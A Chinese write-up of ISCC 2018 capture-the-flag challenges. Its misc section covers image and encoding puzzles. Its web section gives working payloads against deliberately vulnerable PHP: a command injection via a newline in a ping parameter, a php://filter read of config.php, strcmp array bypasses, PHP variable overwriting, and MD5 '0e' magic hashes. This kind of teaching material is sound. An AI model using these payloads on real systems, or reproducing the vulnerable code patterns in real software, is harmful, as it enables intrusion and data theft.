avatar

ISCC 2018 部分题目writeup

Misc部分

  1. What is that?

附件:201805061525609942829794.rar

从手势中可以猜测出Flag可能隐藏在下方,丢进tweakpng看到IHDR的crc验证错误,这时可以试着修改图片的高度

201805061525610307444475.png

201805061525610413623863.png

将1F4(500)修改为258(600),改完保存重新打开即可

201805061525610552743291.png

  1. 秘密电报

  1. 题目内容:
  2. ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA

这是培根,所以直接到在线解密网站解密培根密码加解密

  1. 重重谍影

这是一道脑洞题,简单的要命。层层迷雾之后就是答案,刹那便是永恒。南无阿弥陀佛。

Vm0wd2QyVkZOVWRXV0doVlYwZG9WVll3WkRSV2JGbDNXa1JTVjAxWGVGWlZNakExVjBaS2RHVkljRnBXVm5CUVZqQmtTMUl4VG5OaFJtUlhaV3RHTkZkWGRHdFRNVXB6V2toV2FsSnNjRmhhVjNoaFYxWmFjMWt6YUZSTlZtdzBWVEo0YzJGR1NuTlhiR2hYWVd0d2RsUnRlR3RqYkdSMFVteFdUbFp0ZHpCV2EyTXhVekZSZUZkc1ZsZGhlbXhoVm01d1IyTldjRVZTYlVacVZtdHdlbGRyVlRWVk1ERldZMFZ3VjJKR2NIWlpWRXBIVWpGT1dXSkhhRlJTVlhCWFZtMDFkMUl3TlhOVmJGcFlZbGhTV1ZWcVFURlRWbEY0VjIxR2FGWnNjSGxaYWs1clZqSkdjbUo2UWxwV1JWcDZWbXBHVDJNeGNFaGpSazVZVWxWd1dWWnRNVEJXTVUxNFdrVmtWbUpHV2xSWlZFNVRWVVpzYzFadVpGUmlSbHBaVkZaU1ExWlhSalpTYTJSWFlsaENVRll3V21Gak1XUnpZVWRHVTFKV2NGRldha0poV1ZkU1YxWnVTbEJXYldoVVZGUktiMDB4V25OYVJFSm9UVlpXTlZaSE5VOVdiVXB5WTBaYVdtRXhjRE5aTW5oVFZqRmFkRkpzWkU1V2JGa3dWbXhrTUdFeVJraFRiRnBYWVd4d1dGWnFUbE5YUmxsNVRWVmFiRkp0VW5wWlZWcFhZVlpLZFZGdWJGZGlXRUpJV1ZSS1QxWXhTblZWYlhoVFlYcFdWVmRYZUZOamF6RkhWMjVTYWxKWVVrOVZiVEUwVjBaYVNFNVZPVmRXYlZKS1ZWZDRhMWRzV2taWGEzaFhUVlp3V0ZwR1pFOVRSVFZZWlVkc1UyRXpRbHBXYWtvd1lURkplRmR1U2s1V1ZscHdWVzB4VTFac1duUk5WazVPVFZkU1dGZHJWbXRoYXpGeVRsVndWbFl6YUZoV2FrWmhZekpPUjJKR1pGTmxhMVYzVjJ0U1IyRXhUa2RWYmtwb1VtdEtXRmxzWkc5a2JHUllaRVprYTJKV1ducFhhMXB2Vkd4T1NHRklRbFZXTTJoTVZqQmFZVk5GTlZaa1JscFRZbFpLU0ZaSGVGWmxSbHBYVjJ0YVQxWldTbFpaYTFwM1dWWndWMXBHWkZSU2EzQXdXVEJWTVZZeVNuSlRWRUpYWWtad2NsUnJXbHBsUmxweVdrWm9hVkpzY0ZsWFYzUnJWVEZaZUZkdVVtcGxhMHB5VkZaYVMxZEdXbk5oUnpsWVVteHNNMWxyVWxkWlZscFhWbGhvVjFaRldtaFdha3BQVWxaU2MxcEhhRTVpUlc4eVZtdGFWMkV4VVhoYVJXUlVZa2Q0Y1ZWdGRIZGpSbHB4VkcwNVZsWnRVbGhXVjNSclYyeGFjMk5GYUZkaVIyaHlWbTB4UzFaV1duSlBWbkJwVW14d2IxZHNWbUZoTWs1elZtNUtWV0pHV2s5V2JHaERVMVphY1ZKdE9XcE5WbkJaVld4b2IxWXlSbk5UYldoV1lURmFhRlJVUm1GamJIQkhWR3hTVjJFelFqVldSM2hoWVRGU2RGTnJXbXBTVjFKWVZGWmFTMUpHYkhGU2JrNVlVbXR3ZVZkcldtdGhWa2w1WVVjNVYxWkZTbWhhUkVaaFZqRldjMWRzWkZoU01taFFWa1phWVdReFNuTldXR3hyVWpOU2IxVnRkSGRXYkZwMFpVaE9XbFpyY0ZsV1YzQlBWbTFXY2xkdGFGWmlXRTE0Vm0xNGExWkdXbGxqUms1U1ZURldObFZyVGxabGJFcENTbFJPUlVwVVRrVSUzRA==

首先对熟悉的base64进行解密

解到最后解不下去了,以下是最后一段,看起来有点像AES
U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4 B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z iN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=

201805061525611748799016.png

把这串字符复制到百度发现和与佛论禅有关

201805061525611984492573.png

  1. 有趣的ISCC

附件:201805061525612156336049.zip

用winhex发现在文件尾有一串编码,将编码保存下来

经过处理后

u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d

先拿到Unicode解密看看, 第一次解密后变成
\u0066\u006c\u0061\u0067\u007b\u0069\u0073\u0063\u0063\u0020\u0069\u0073\u0020\u0066\u0075\u006e\u007d
再进行一次解密
内容为:flag{*****}

  1. Where is the FLAG?

附件: 201805071525660839164719.zip
201805071525660839164719.zip
将文件放到tweakpng,发现是由Adobe Fireworks CS5做的,测试拉入其软件

201805071525657126872256.png

很明显这是一个二维码,接下来根据顺序平凑成一个二维码

201805071525660733433458.png

  1. 凯撒十三世

凯撒十三世在学会使用键盘后,向你扔了一串字符:“ebdgc697g95w3”,猜猜它吧。

提交发现不对,经过大佬提示说是键盘密码,照着键盘对应可以发现一个规律 r下方是f,o下方是l,q下方是a,t下方是g:flag……(得到flag)

  1. 一只猫的心思

    附件: 201805071525661482605693.rar

用winhex发现文件尾部存在一个doc文档,在kali使用foremost将文件分离,(在winhex分离也可以)

201805071525661778504786.png

doc内容:

名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

很像之前的与佛论禅,解密完后是一串16进制,将16进制转换为文本看看

201805071525661938706831.png

解密完,是一串base64

201805071525662027122326.png

解密一次后就解不下去了,想到了还有一个base32呢

GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E

base32解密后又是一串16进制

5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D

之后就是 16转字符->base64解码->base32解码->16进制转字符->flag{…..}

  1. 暴力XX不可取

附件:201805071525662386197326.zip

A同学要去参加今年的ISCC。大赛在即,A同学准备了一批暴力破解工具,你感觉这个靠谱吗?

打开压缩,发现需要密码,题目提示 爆破不可取,猜测它是ZIP伪加密

工具: ZipCenOp.jar

解压得到:vfppjrnerpbzvat,又是凯撒密码

列出所有组合发现了flag的身影,其实就是i偏移13位

201805071525662976840971.png

WEB部分

web01

1
2
3
4
5
6
7
8
9
10
<?php 
highlight_file('2.php');
$flag='{***************}';
if (isset($_GET['password'])) {
if (strcmp($_GET['password'], $flag) == 0)
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>

strcmp函数遇到数组会报错


一切都是套路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

include "flag.php";

if ($_SERVER["REQUEST_METHOD"] != "POST")
die("flag is here");

if (!isset($_POST["flag"]) )
die($_403);

foreach ($_GET as $k => $v){
$$k = $$v;
}

foreach ($_POST as $k => $v){
$$k = $v;
}

if ( $_POST["flag"] !== $flag )
die($_403);

echo "flag: ". $flag . "\n";
die($_200);

?>

从代码中阔以看出这是一个变量覆盖漏洞

构造攻击:

http://118.190.152.202:8009/?_200=flag

postdata:

flag=111

原理:
foreach ($_GET as $k => $v){
$$k = $$v; //将$_200注册为变量并且赋值为$flag的值
}
由于if (!isset($_POST[“flag”]) )的限制post变量中必须要包含flag,但是由于下面代码又把flag覆盖掉了
foreach ($_POST as $k => $v){
$$k = $v; ////将flag注册为变量赋值为111
}
所以无法直接看到flag,所以需要将$_200的值覆盖为$flag


请ping我的ip 看你能Ping通吗?

%0a符号
换行符
%0d符号
回车符
;符号
在 shell 中,担任”连续指令”功能的符号就是”分号”
&符号

使用[http://118.190.152.202:8018/?ip=127.0.0.1%0acat%20index.php](http://118.190.152.202:8018/?ip=127.0.0.1
ls ../../../)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.025 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.025/0.025/0.025/0.000 ms
'',
';' => '',
'|' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );

if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 1 ' . $target );
}
echo "{$cmd}";

?>

Please give me username and password!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
if (0 == strcasecmp($flag,$_GET['username'])){
$a = fla;
echo "very good!Username is right";
}
else{
print 'Username is not right<!--index.php.txt-->';}
}else
print 'Please give me username or password!';
if (isset($_GET['password'])){
if (is_numeric($_GET['password'])){
if (strlen($_GET['password']) < 4){
if ($_GET['password'] > 999){
$b = g;
print '<p>very good!Password is right</p>';
}else
print '<p>Password too little</p>';
}else
print '<p>Password too long</p>';
}else
print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
print $flag;
?>
1
2
3
4
5
if (strlen($_GET['password']) < 4){//字符长度等于4不包括4
if ($_GET['password'] > 999){//password要大于999 这个条件看起来很不科学,几乎不可能成立 ,但是改变一下方法是可以的

}
}
1
2
if (0 == strcasecmp($flag,$_GET['username'])){ //用户名要等于flag????,
}

1.strcasecmp遇到数组会返回NULL,null=0于是条件成立

2.password虽然只能到999,100便报错,但是可以用16进制3E8来绕过

构造url为:http://118.190.152.202:8017/index.php?username[]=&password=3E8


试试看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
此代码是事后获取到的
<?php
error_reporting(0);
ini_set('display_errors','Off');
include('config.php');
$img = $_GET['img'];
if(isset($img) && !empty($img))
{
if(strpos($img,'jpg') !== false)
{ //查找匹配,img里不存在*.jpg则终止并返回File not found.
if(strpos($img,'resource=') !== false && preg_match('/resource=.*jpg/i',$img) === 0)
{
die('File not found.');
}
//匹配类似于?img=php://filter/read=convert.base64-encode/resource=1.jpg的形式
preg_match('/^php:\/\/filter.*resource=([^|]*)/i',trim($img),$matches);
if(isset($matches[1]))
{
$img = $matches[1];
}
header('Content-Type: image/jpeg');
$data = get_contents($img);
echo $data;
}
else
{
die('File not found.');
}
}
else
{
?>
<img src="1.jpg">
<?php
}
?>

绕过方法可以是

show.php?img=php://filter/read=convert.base64-encode/resource=config.php||||1.jpg

view-source:118.190.152.202:8006/show.php?img=php://filter/read=convert.base64-encode/resource=2.jpg/resource=config.php


php是世界上最好的语言

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<html> 
<body>
<form action="md5.php" method="post" >
用户名:<input type="text" name="username"/>
密码:<input type="password" name ="password"/>
<input type="submit" >
</body>
</html>
<?php
header("content-type:text/html;charset=utf-8");
if(isset($_POST['username'])&isset($_POST['password'])){
$username = $_POST['username'];
$password = $_POST['password'];
}
else{
$username="hello";
$password="hello";
}
if(md5($password) == 0){
echo "xxxxx";
}

show_source(__FILE__);
?>

从if(md5($password) == 0)可以看出这是PHP的一个Hash比较缺陷。

0e在比较的时候会将其视作为科学计数法,所以无论0e后面是什么,0的多少次方还是0

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

s1091221200a
0e940624217856561557816327384675

以上部分都可绕过

登录后,来到一个页面

1
2
3
4
5
6
7
<?php 
include 'flag.php';
$a = @$_REQUEST['a'];
@eval("var_dump($$a);");
show_source(__FILE__);

?>

从 @eval(“var_dump($$a);”); 可以看出此处存在一个变量注册的缺陷,当输入GLOBALS时即可看到flag


评论